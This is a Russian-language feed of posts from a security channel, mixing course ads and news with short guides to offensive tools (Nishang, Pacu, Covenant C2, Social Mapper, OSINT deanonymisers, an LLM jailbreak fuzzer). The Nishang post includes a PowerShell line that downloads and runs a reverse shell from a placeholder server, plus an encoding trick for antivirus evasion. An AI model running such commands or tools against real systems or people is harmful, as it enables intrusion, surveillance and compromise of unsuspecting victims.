34787
Крупнейшее ИБ сообщество ру-сегмента Чат: @codeby_one Форум: codeby.net Обучение: codeby.school Пентест: codeby.one CTF: codeby.games VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Номер заявления для регистрации канала в РКН: 5035340278
Мы обновили курс SQL Injection Master
Что стало лучше:
⏺️ Оптимизировали логику работы заданий и систему проверки ответов
⏺️ Повысили стабильность лабораторий и корректность работы под нагрузкой
⏺️ Обновили интерфейс и улучшили пользовательский опыт
⏺️ Доработали отдельные задания для более корректного и предсказуемого поведения
⏺️ Добавили бонусный материал для всех, кто успешно сдал экзамен
Если уже проходили курс — загляните ещё: стало удобнее и стабильнее. Если нет, то самое время начать ➡️ тут
Для всех влюбленных в ИБ!
Иногда достаточно небольшого жеста, чтобы в мире логики и переменных возникло что‑то безусловное. Напомните о своих чувствах на вашем языке — это будет по‑настоящему.
В истории киберпреступности мало фигур, сопоставимых с Альбертом Гонсалесом. Сын кубинских эмигрантов прошел путь от школьника, взломавшего NASA, до информатора Секретной службы и одновременно лидера банды, укравшей данные 170 миллионов банковских карт.
⏺️Как все начиналось
Гонсалес родился в Майами. В 12 лет сам купил первый компьютер, а к 14 взломал сети NASA. Учителя называли его «проблемным лидером группы ботаников». В 1999-м он с приятелями взломал правительственные сервера Индии — визит ФБР закончился лишь предупреждением.
⏺️Shadowcrew и вербовка
К 2002 году Гонсалес переехал в Нью-Джерси и стал ключевой фигурой на подпольном форуме Shadowcrew. Под ником CumbaJohnny он торговал крадеными кредитками. В 2003-м его арестовали случайно — полицейский обратил внимание на парня в женском парике. При нем нашли 15 поддельных карт, а дома — миллионы номеров. Но вместо тюрьмы Гонсалесу предложили сделку: свобода в обмен на сотрудничество.
Он помог внедрить агентов в администрацию Shadowcrew и даже предложил перенести серверы форума на оборудование, которое «принадлежало ему». На самом деле серверы стояли в армейском гараже под контролем Секретной службы. В 2004 году 28 участников Shadowcrew арестовали.
Общий улов — еще
130 миллионов
карт. Операцию назвали
«Get rich or die tryin’»
по мотивам альбома
50 Cent
.
Ущерб от его действий превысил 200 миллионов долларов. Он не был активистом — просто охотником за деньгами, который слишком долго испытывал удачу. Его дело до сих пор изучают в Академии ФБР как классический кейс «крота» из мира хакинга.
🧠 Prompt Fuzzer — интерактивный fuzzer для защиты системного промпта GenAI‑приложений
Prompt Fuzzer — это open source‑утилита для динамического тестирования системного промпта на устойчивость к jailbreak‑атакам, prompt‑инъекциям и попыткам вытянуть системные данные
pip install prompt-security-fuzzer
export OPENAI_API_KEY=sk-123XXXXXXXXXXXX
prompt-security-fuzzer
prompt-security-fuzzer, prompt-security-fuzzer -b ./system_prompt.examples/medium_system_prompt.txt
prompt-security-fuzzer -b ./system_prompt.examples/medium_system_prompt.txt \
--custom-benchmark=ps_fuzz/attack_data/custom_benchmark1.csv
prompt-security-fuzzer -b ./system_prompt.examples/medium_system_prompt.txt \
--custom-benchmark=ps_fuzz/attack_data/custom_benchmark1.csv \
--tests='["ucar","amnesia"]'
Dorkbot: Автоматизированный инструмент для поиска уязвимостей через поисковые системы
Dorkbot — модульный инструмент командной строки с открытым исходным кодом, предназначенный для автоматизации поиска уязвимостей на веб-ресурсах, обнаруженных через публичные поисковые системы или архивы интернета (Common Crawl и Wayback Machine). Его архитектура разделяет процессы сбора целей (индексирования) и их проверки (сканирования), что обеспечивает гибкость и контроль на каждом этапе безопасности.
Все обнаруженные цели сохраняются в базе данных, что позволяет управлять ими, отслеживать статус проверки и избегать дублирования. После сканирования формируется детальный отчет в формате
JSON
, содержащий информацию о найденных уязвимостях.
pipх install dorkbot
dorkbot -h
dorkbot -i google_api -o key=YOUR_API_KEY -o engine=YOUR_CSE_ID -o query="inurl:view.php?id=" -s wapiti --count 10 --random --log scan_session.log
dorkbot -d /opt/security/dorkbot.db --list-targets --unscanned-only --add-blocklist-item "regex:.*logout.*" --add-blocklist-item "host:admin.example.com" --prune
Цели, соответствующие новым правилам блоклиста, будут помечены как отсканированные (или удалены, если добавить флаг -m), а дубликаты на основе отпечатков будут исключены из очереди на сканирование
🐘 Pacu — фреймворк для эксплуатации AWS‑окружений и проверки облачной безопасности
Pacu — открытый AWS exploitation‑фреймворк от Rhino Security Labs, который помогает выявлять ошибки конфигурации в аккаунтах AWS. Инструмент построен модульно, поддерживает десятки сценариев атак (от эскалации привилегий до обхода логирования) и позволяет быстро собирать боевые цепочки действий против облачной инфраструктуры.
🎇 Основные возможности Pacu
📉 Модульная архитектура: десятки модулей для скнирования, повышения привелегий и создание бекдоров IAM‑пользователей, атак на Lambda и работы с логами.
📉 Использует локальную SQLite‑БД и общую структуру данных, чтобы повторно использовать результаты модулей и минимизировать количество AWS API‑запросов.
🖱 Встроенный аудит: логирование команд, экспорт отчётов и таймлайна атаки для последующего анализа и документирования.
💻 Базовый сценарий использования
▶️ Первый запуск создаёт сессию, в которой хранятся AWS‑ключи и все собранные данные; можно держать несколько сессий под разные тесты и окружения.
▶️ Через команду set_keys задаются access key, secret key и (опционально) session token, после чего становятся доступны модули для работы с целевым AWS‑аккаунтом.
▶️ Команды list, help <module>, run <module> помогают быстро находить нужные модули и запускать их с параметрами, включая таргетинг по регионам (--regions eu-west-1,us-west-1).
⬇️ Установка и запуск
⏺️ Установка Pacu и зависимостей:
pip3 install -U pip
pip3 install -U pacu
pacu
set_keys по интерактивным подсказкам. docker run -it rhinosecuritylabs/pacu:latest
~/.aws в контейнерdocker run -it -v ~/.aws:/root/.aws rhinosecuritylabs/pacu:latest
⚡️ Nishang — набор скриптов и полезных нагрузок, позволяющих использовать PowerShell для наступательной безопасности, тестирования на проникновение и работы в составе «красной команды».
⏺️ Сотни готовых скриптов, сгруппированных по фазам: Gather (сбор инфы, ключи WiFi, LSASS, pass hints), Escalation (UAC bypass, duplicate tokens), Shells (TCP/UDP/HTTP/ICMP reverse shells), Backdoors (HTTP/DNS/WMI persistence).
⏺️ Клиентские векторы: генерация фишинговых CHM, Word/Excel, HTA, JS/SCF/SCT для выполнения PS‑команд; поддержка MITM и exfiltration через Gmail/Pastebin/DNS.
⏺️ Utility‑функции: Invoke-Encode для кодирования скриптов (обход AV), in‑memory execution, port scan, brute‑force и даже Powerpreter — монолитный модуль со всей функциональностью.
☁️ Базовый сценарий использования
➡️ Импорт всех скриптов в сессию:
Import-Module .\nishang.psm1
. C:\nishang\Gather\Get-Information.ps1
Get-Information
Get-Help <scriptname> -Full (функция с именем скрипта экспортируется в сессию).powershell iex (New-Object Net.WebClient).DownloadString('http://<server>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <Port>git clone https://github.com/samratashok/nishang
cd nishang
Import-Module .\nishang.psm1
. .\Utility\Invoke-Encode
Invoke-Encode -DataToEncode Invoke-PowerShellTcp.ps1 -OutCommand
powershell -e <encoded>
Adversarial Robustness Toolbox (ART) — это Python‑библиотека для безопасности моделей машинного обучения: она помогает атаковать, защищать и проверять ML‑системы на устойчивость к угрозам вроде подмены входных данных или отравления обучающей выборки.
🔎 Что такое ART и кому она нужна
ART развивается под эгидой Linux Foundation AI & Data и изначально была запущена IBM как открытый инструмент для исследований в области adversarial machine learning. Библиотека ориентирована одновременно на red team и blue team.
❗️ Поддерживаемые фреймворки, данные и задачи
➡️ Фреймворки: TensorFlow, Keras, PyTorch, MXNet, scikit‑learn, XGBoost, LightGBM, CatBoost, GPy и др., то есть большинство популярных стеков для классического ML и DL.
➡️ Типы данных: изображения, табличные данные, аудио, видео и другие форматы, что позволяет тестировать как CV‑модели, так и, например, речь или временные ряды.
➡️ Задачи: классификация, детекция объектов, генерация, задачи сертификации и верификации устойчивости и т.п.
⛓️💥 Типы атак в ART
ART реализует десятки сценариев, сгруппированных вокруг четырёх основных классов угроз:
⏺️Evasion: небольшие модификации входных данных, которые заставляют модель ошибаться (adversarial examples для картинок, аудио и т.д.).
⏺️Poisoning: изменение обучающей выборки для скрытого влияния на поведение модели в проде.
⏺️Extraction: попытка «украсть» модель через массовые запросы к её API и восстановить или клонировать её поведение.
⏺️Inference: атаки на приватность, когда по ответам модели пытаются восстановить данные обучения.
#ai #security #adversarial #tool
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
🐒 Infection Monkey — open source платформа эмуляции противника для тестирования устойчивости сети к реальным атакам
Infection Monkey имитирует поведение вредоносного ПО в контролируемой среде: агент сам распространяется по сети, пытается взламывать узлы и отправляет телеметрию на сервер Monkey Island для наглядных карт распространения и отчётов. Такой «безопасный вирус» помогает видеть реальные вектора атак и проверять, насколько хорошо срабатывают средства защиты и процессы.
🍎 EVA (Exploit Vector Agent) - агент для тестирования на проникновение с использованием искусственного интеллекта, который повышает эффективность работы в сфере наступательной безопасности, предоставляя структурированные рекомендации по атакам, контекстный анализ и интеграцию с несколькими бэкендами ИИ.
Основные функции
🔴Интеллектуальное моделирование: продвинутый анализ на базе ИИ и определение путей атаки в зависимости от запроса.
🔴Автоматизированное перечисление: систематическая разведка цели и сбор информации о ней.
🔴Оценка уязвимости: выявление уязвимостей с помощью ИИ и стратегии их эксплуатации, с рекомендациями следующих шагов для эксплуатации уязвимостей.
🔴Несколько ИИ-бэкендов: поддержка Ollama, OpenAI GPT, G4F.dev и пользовательских API-эндпоинтов.
🔴Управление сессиями: постоянные сессии и чаты.
🔴Интерактивный интерфейс: выполнение команд в режиме реального времени и анализ результатов в несколько этапов.
👻 Установка и настройка
curl -fsSL https://ollama.ai/install.sh | shr
git clone https://github.com/ARCANGEL0/EVA.git
cd EVA
chmod +x eva.py
sudo mv eva.py /usr/local/bin/eva
python3 eva.py
OpenSquat
openSquat — это инструмент кибербезопасности, основанный на разведке на основе открытых источников, который выявляет угрозы киберсквоттинга, нацеленные на ваш бренд или домены. Утилита полезна для определения фишинга.
📕Характиристика:
1️⃣Phishing - Фейковые домены, имитирующие ваш сайт.
2️⃣Тайпосквоттинг - Домены с распространенными опечатками (например, codeeby.net).
3️⃣IDN Homograph - Символы, похожие на символы других алфавитов (например, cоdeby.net (буква о кириллическая)).
4️⃣Интеграция с VirusTotal - для проверки репутации домена.
5️⃣Quad9 DNS validation - для выявления вредоносных доменов.
💻Установка:
git clone https://github.com/atenreiro/opensquat.git
cd opensquat/
pip install -r requirements.txt --break-system-packages
python opensquat.py
В файле keywords.txt вы можете вписать интересующий вас домен.
CloudRip
Инструмент, помогающий найти реальные IP-адреса, скрывающиеся за Cloudflare, путем проверки поддоменов. Подходит для тестирования на проникновение, исследований в области безопасности и изучения принципов работы защиты Cloudflare.
📕Характеристика:
1️⃣Обнаружение нескольких IP-адресов — находит ВСЕ IP-адреса за доменом, а не только первый
2️⃣Динамическое обнаружение IP-адресов Cloudflare — получает последние диапазоны IP-адресов из API Cloudflare (с резервным вариантом)
3️⃣Фильтрация IP-адресов Cloudflare — показывает только реальные адреса серверов
4️⃣Ограничение скорости — не будет рассылать спам целевому серверу и блокировать вас
5️⃣Поддержка IPv4 и IPv6 — разрешает записи A и AAAA
💻Установка:
git clone https://github.com/moscovium-mc/CloudRip
cd CloudRip/
pip3 install -r requirements.txt
python3 cloudrip.py <DOMAIN>
python3 cloudrip.py <DOMAIN> -w <WORDLIST> -w <WORDLIST2>
python3 cloudrip.py <DOMAIN> -v
Друзья, напоминаем, на каких курсах начинается обучение в феврале🚗
Старт 2 февраля:
⏺️Курс «Цифровая криминалистика и реагирование на инциденты ОС Linux (DFIR)» — ищем и анализируем следы кибервзломов (анализ артефактов, работа с opensource инструментами).
⏺️Курс «Профессия DevSecOps - инженер: безопасная разработка» — освоите DevSecOps-инженерию: от автоматизации безопасности до работы с Kubernetes и Terraform.
⏺️Курс «Реверсивный инжиниринг ПО под ОС Windows» — освоим техники по поиску уязвимости и рассмотрим методы заражения машин.
⏺️Курс «Введение в Реверс инжиниринг» — научимся взламывать программы и файлы без наличия исходного кода на компилируемых языках.
Старт 9 февраля:
⏺️Курс «Основы кибербезопасности» — освоите ключевые навыки информационной безопасности: от основ Linux до проведения пентестов.
⏺️Курс «Администрирование ОС Linux» — познакомимся с Linux и смежным ПО: от основ командной строки до развертывания Kubernetes.
Старт 16 февраля:
⏺️Курс «Профессия Пентестер» — учимся эксплуатировать онлайн-уязвимости и обходить антивирусы. Изучаем инструменты: сканеры, Bash-скрипты, пентест AD.
⏺️Курс «Анализ защищенности приложений Андроид» — изучим этапы создания мобильного приложения, приемы реверса и возможные уязвимости.
⏺️Курс «Профессия AppSec-инженер» — научитесь анализировать код, находить уязвимости, строить безопасную архитектуру и применять OWASP-практики на реальных проектах. Запись на первый поток с выгодой 10➗
✉️ Запишитесь у нашего менеджера @CodebyAcademyBot
Или узнайте подробности и программы курсов на нашем ➡️ сайте
Коллеги, продолжаем серию практикумов от Codeby Academy🔥
Встречаемся в понедельник и проводим настоящее OSINT-расследование с Катей Тьюринг.
🟧 Регистрация в боте: https://osint-workshop.codeby.school/
Что будет:
🟧 Реальное OSINT-расследование с экспертом
🟧 Поиск скрытых связей, бенефициаров бизнеса и теневых "решал"
🟧 Работа с открытыми источниками без шаблонов
🟧 Построение гипотез и их проверка в процессе
🟧 Верификация данных и аналитические решения
Вы увидите работу опытного OSINT-аналитика в прямом эфире — с логикой, находкой, и решениями.
Почему важно быть онлайн: можно задавать вопросы и по ходу увидеть процесс, понять как формируется аналитическое мышление.
🟧 2 февраля , 19:00 МСК
🟧 Онлайн, бесплатно
🟧 Регистрация: https://osint-workshop.codeby.school
Вопросы по участию:
@CodebyAcademyBot
🚩 Новые задания на платформе HackerLab!
🎢 Категория Разное — APT 2.0
🗂 В архив добавлены задания + райтапы:
🔵Веб - Веб-центр
🔵Веб - Магазин
Приятного хакинга!
Как усилить свою позицию на рынке ИБ в 2026? Академия Кодебай предлагает системный подход с поддержкой экспертов!
Если вы планируете развиваться в ИБ или углубить текущую специализацию, сейчас открыты наборы по направлениям:
⏺️ DevSecOps-инженер
⏺️ DFIR (цифровая криминалистика и реагирование на инциденты Linux)
⏺️ Реверсивный инжиниринг (Windows и базовый курс)
⏺️ Основы информационной безопасности
⏺️ AppSec инженер
⏺️ Профессия Пентестер
⏺️ Анализ защищенности Android-приложений
Формат — практическое обучение с фокусом на инженерные навыки:
CI/CD и безопасность инфраструктуры, анализ инцидентов, работа с артефактами, исследование ПО без исходников, SAST/DAST, тестирование на проникновение, мобильная безопасность.
Тем временем у нас взят first blood на про-лабе Mr.Robot 👀
Это цепочка из 3 взаимосвязанных машин с вайбом одноимённого сериала: от первой веб-зацепки переходим к скрытым сервисам, внутренней сети и нестандартным протоколам
Если хочется пройти цепочку самому — лаборатория тут: hackerlab.pro/labs/mrrobot
Инструмент с открытым исходным кодом, который использует технологию распознавания лиц для сопоставления профилей в социальных сетях на разных платформах. Автоматически ищет в указываемых социальных сетях имена и фотографии целей для точного определения и группировки профилей. По результатам работы генерирует отчет.
sudo add-apt-repository ppa:mozillateam/firefox-next && sudo apt update && sudo apt upgrade
sudo apt-get install build-essential cmake
sudo apt-get install libgtk-3-dev
sudo apt-get install libboost-all-dev
git clone https://github.com/Greenwolf/social_mapper
cd social_mapper/setup
python3 -m pip install --no-cache-dir -r requirements.txt
python3 social_mapper.py -f imagefolder -i ./Input-Examples/imagefolder/ -m fast -fb -tw
python3 social_mapper.py -f company -i "Evil Corp LLC" -m accurate -a -t strict
☁️ Covenant — .NET C2‑фреймворк для пост-эксплуатаци
Covenant — кросс-платформенный C2 на ASP.NET Core с веб‑панелью, много‑пользовательским режимом и поддержкой «Grunt»‑имплантов для управления скомпрометированными хостами в корпоративных сетях.
git clone --recurse-submodules https://github.com/cobbr/Covenant.git
cd Covenant/Covenant
dotnet build
dotnet run
https://127.0.0.1:7443/, создать учётку оператора и перейти к настройке Listener/Launcher/Grunt. docker run -it -p 7443:7443 -p 80:80 -p 443:443 --name covenant -v </absolute/path/to/Covenant/Covenant/Data>:/app/Data covenant
🤖 Как выявлять и предотвращать утечки информации по сетевым скрытым каналам
Команда HEX.TEAM приглашает на открытый профессиональный вебинар «Противодействие утечке информации по сетевым скрытым каналам» — с разбором теории, практики и реальных кейсов из проектов.
О чём поговорим:
• как строятся классические и современные сетевые скрытые каналы в различных сетевых протоколах
• как определить, является ли угроза утечки информации по сетевым скрытым каналам реальной для вашей организации
• как выстраивается система защиты от подобных утечек
📅 Дата: 18/02/2026
🕓 Время: 16:00
💻 Онлайн, участие бесплатное
Спикер:
Михаил Финошин
руководитель отдела исследований ИБ HEX.TEAM
старший преподаватель кафедры «Криптология и кибербезопасность» НИЯУ МИФИ
автор более 15 научных публикаций по информационной безопасности
Количество мест ограничено.
👉 Регистрация на вебинар 👈
Подписывайтесь на канал HEX.TEAM - здесь мы регулярно делимся практикой, кейсами и инженерным взглядом на информационную безопасность.
Реклама. Erid: 2VtzqvmkHqd
WAFW00F: Технологический инструмент для идентификации веб-приложений межсетевых экранов
WAFW00F - инструмент с открытым исходным кодом, разработанный для точного определения и классификации (снятия отпечатков) продуктов Web Application Firewall (WAF), защищающих веб-сайт. Поддержкой и развитием проекта занимается компания EnableSecurity. Этот инструмент является стандартным в арсенале специалистов по кибербезопасности, пентестеров и администраторов, позволяя им проанализировать безопасностный периметр целевого приложения.
База сигнатур включает более
150 WAF (Cloudflare, Imperva Incapsula, F5 BIG-IP, Fortinet, ModSecurity, AWS, Google Cloud, Microsoft Azure и другие)
.
pipх install wafw00f
wafw00f -h
wafw00f https://example.org
wafw00f -l
wafw00f https://site1.com http://site2.net -o results.json
wafw00f https://target.com -a -v
🚩 Новые задания на платформе HackerLab!
🎢 Категория Разное — Drakosha Ali
🔎 Категория OSINT — Спецслужбы
Приятного хакинга!
OSINT-SAP Project
Бесплатный OSINT-SAN Framework дает возможность быстро находить информацию и деанонимизировать пользователей сети интернет. С помощью нашего ПО вы сможете собирать информацию о пользователях как при использовании linux.
📕Характиристика:
1️⃣Сканирование и вывод информации IP и доменных адресов (Whois, shodan, DNS lookup, TCP port scan)
2️⃣Сбор информации о мобильном номере
3️⃣Создание рандомной сетевой личности
4️⃣Поиск по никнейму
5️⃣Поиск по bitcoin кошельку
💻Установка:
git clone https://github.com/Bafomet666/OSINT-SAN.git
cd OSINT-SAN/
pip3 install -r requirements.txt --break-system-packages
python3 osintsan.py
Что такое фишинговые ссылки и как они работают?
"Я же не кликаю на спам"— думаем мы, читая очередной пост о кибербезопасности. Такая уверенность, что фишинг обойдет нас стороной, стала его главным преимуществом. Мошенники постоянно оттачивают свои методы, а фишинговые ловушки становятся все изощреннее. Именно на автоматизм и миг невнимательности они и рассчитывают, создавая идеальные копии сайтов и писем.
Рассказываем, в чем суть фишинга, как проводится эта атака и почему ее жертвами становятся даже опытные пользователи.
➡️ В статье вы найдете рекомендации, как не попасться на мошенническую схему, и четкий план действий на случай, если вы уже оказались в ловушке.
#Фишинг #Инфобезопасность #БезопасностьАккаунтов
➡️ Все наши каналы 💬Все наши чаты ⚡️ Для связи с менеджером
Strix
⏺️ Strix — это open-source инструмент на базе ИИ для автоматизированного пентеста, который имитирует действия реального хакера.
🧾 Он использует большие языковые модели (LLM), такие как от OpenAI или Anthropic, для планирования, выполнения инструментов (Nmap, SQLMap и др.), анализа результатов и итераций. Агенты Strix работают автономно или в командах, сотрудничая через графовую модель для разведки, сканирования уязвимостей и создания PoC-эксплойтов. Поддерживает Docker, CLI-режим, headless-тестирование и интеграцию с CI/CD.
✉️ Главное преимущество в отчетах: Strix генерирует детальные отчеты (Markdown/JSON/SARIF) с доказательствами, рекомендациями по фиксу и приоритетами для быстрого устранения.
Установка и использование:
🎇 Клонируйте репозиторий с GitHub
✉️ clone https://github.com/usestrix/strix.git
strix --target https://your-app.com
strix --target https://your-app.com --instruction "Perform authenticated testing using credentials: user:pass"
Специалисты Computer Security and Industrial Cryptography обнаружили критическую уязвимость с идентификатором CVE-2025-36911 и названием WhisperPair в протоколе Google Fast Pair. Проблема затрагивает миллионы наушников, гарнитур и колонок по всему миру (Google, Jabra, JBL, Logitech, Marshall, Nothing, OnePlus, Sony, Soundcore и Xiaomi).
Эта атака занимает в среднем 10 секунд на реалистичных дистанциях (до 14 метров) и не требует физического доступа к уязвимому устройству.
Стоит отметить, что Google признала проблему, выплатив исследователям максимальное вознаграждение в размере $15 000 и совместно с производителями начала выпуск патчей.
Google Fast Pair позволяет выполнять сопряжение и синхронизацию учётных записей с поддерживаемыми аксессуарами Bluetooth в одно касание. Чтобы сопрячь со смартфоном новую гарнитуру, поддерживающую эту технологию, достаточно включить ее и поднести к смартфону.
Некоторые устройства также поддерживают сеть Google Find Hub, что позволяет пользователям находить потерянные аксессуары с помощью отчетов о местоположении с других устройств Android.
Коллеги, уже в 19:00 МСК пройдет бесплатный практикум по коммерческому OSINT с Катей Тьюринг!
🟧 Регистрация в боте: https://osint-workshop.codeby.school/
Что будет:
🟧 Реальное OSINT-расследование с экспертом
🟧 Поиск скрытых связей, бенефициаров бизнеса и теневых "решал"
🟧 Работа с открытыми источниками без шаблонов
🟧 Построение гипотез и их проверка в процессе
🟧 Верификация данных и аналитические решения
Вы увидите работу опытного OSINT-аналитика в прямом эфире — с логикой, находкой, и решениями.
Почему важно быть онлайн: можно задавать вопросы и по ходу увидеть процесс, понять как формируется аналитическое мышление.
Присоединяйтесь сейчас!
🟧 Регистрация: https://osint-workshop.codeby.school
Вопросы по участию:
@CodebyAcademyBot
Волнительный момент. Хотим его разделить с вами.
Мы обновили наш сайт и хотим понять, как он вам: codeby.academy
Азия под угрозой!
⏺️ Вирус UAT-8099, связанный с Китаем, атакует серверы IIS в Азии с помощью вредоносного ПО BadIIS SEO.
🧾 Обнаруженная с помощью Cisco Talos активность была направлена на уязвимые серверы Internet Information Services (IIS), расположенные по всей Азии, но с особым акцентом на цели в Таиланде и Вьетнаме. Масштабы кампании в настоящее время неизвестны.
🎇 «UAT-8099 использует веб-оболочки и PowerShell для выполнения скриптов и развертывания инструмента GotoHTTP, предоставляя злоумышленнику удаленный доступ к уязвимым серверам IIS», — заявил исследователь безопасности Джои Чен
⛓️💥 Цепочка атак начинается с того, что UAT-8099 получает первоначальный доступ к серверу IIS, как правило, используя уязвимость безопасности или слабые настройки в функции загрузки файлов веб-сервера. Затем злоумышленник инициирует ряд шагов для развертывания вредоносных полезных нагрузок:
➡️ Выполнение команды обнаружения и разведки для сбора информации о системе.
➡️ Разворачивание VPN-инструментов и обеспечение постоянный доступ, создав скрытую учетную запись пользователя с именем "admin$".
➡️ Внедрение новых инструментов, такие как Sharp4RemoveLog (удаление журналов событий Windows), CnCrypt Protect (скрытие вредоносных файлов), OpenArk64 (антируткит с открытым исходным кодом для завершения процессов продуктов безопасности) и GotoHTTP (удаленное управление сервером).
➡️ Разворачивание вредоносного ПО BadIIS, используя только что созданную учетную запись.
🔎 Компания Cisco Talos сообщила об обнаружении трех различных вариантов в кластере BadIIS asdSearchEngine:
➡️ Эксклюзивный вариант с несколькими расширениями, который проверяет путь к файлу в запросе и игнорирует его, если он содержит расширение из списка исключений, которое может быть ресурсоемким или препятствовать отображению веб-сайта.
➡️ Вариант «Загрузка HTML-шаблонов» содержит систему генерации HTML-шаблонов для динамического создания веб-контента путем загрузки шаблонов с диска или использования встроенных резервных вариантов и замены заполнителей случайными данными, датами и содержимым, полученным из URL-адресов.
➡️ Вариант проверки соответствия запрошенного пути динамическому расширению страницы или индексу каталога, который проверяет, соответствует ли запрошенный путь динамическому расширению страницы или индексу каталога.
❗️ На данный момент не зафиксированы случаи атаки в РФ, но будьте внимательны!
#apt #iis #attack
🔗 Все наши каналы 🔁 Все наши чаты 🪧 Для связи с менеджером
🎇В мире искусственного интеллекта появился новый перспективный, но спорный помощник — Moltbot (ранее известный как Clawdbot). Этот инструмент, набравший феноменальные 60.000 звезд на GitHub всего за 3 дня, обещает стать вашим личным цифровым секретарем, способным отвечать на письма, управлять календарем, бронировать столики в ресторанах и даже взаимодействовать с вашими банковскими счетами.
Однако эксперты по кибербезопасности предупреждают: за кажущимся удобством скрываются серьезные риски для конфиденциальности и безопасности данных.
Инструмент настолько популярен среди энтузиастов, что некоторые покупают отдельные устройства (например,
Mac Mini
) специально для его развертывания. Управление происходит через знакомые мессенджеры, что создает иллюзию простоты и безопасности, но реальность оказывается сложнее.
В двух критичных случаях доступны были API-ключи Anthropic, токены Telegram, OAuth Slack и месяцы переписок. Хотя патч выпущен, факт уязвимых экземпляров показывает нехватку знаний у пользователей.
Угроза усиливается тем, что Clawdbot работает локально с полным доступом к системе (файлы, терминал, браузер).
~/.clawdbot/ и ~/clawd/. Малвари RedLine, Lumma и Vidar уже адаптировались для кражи.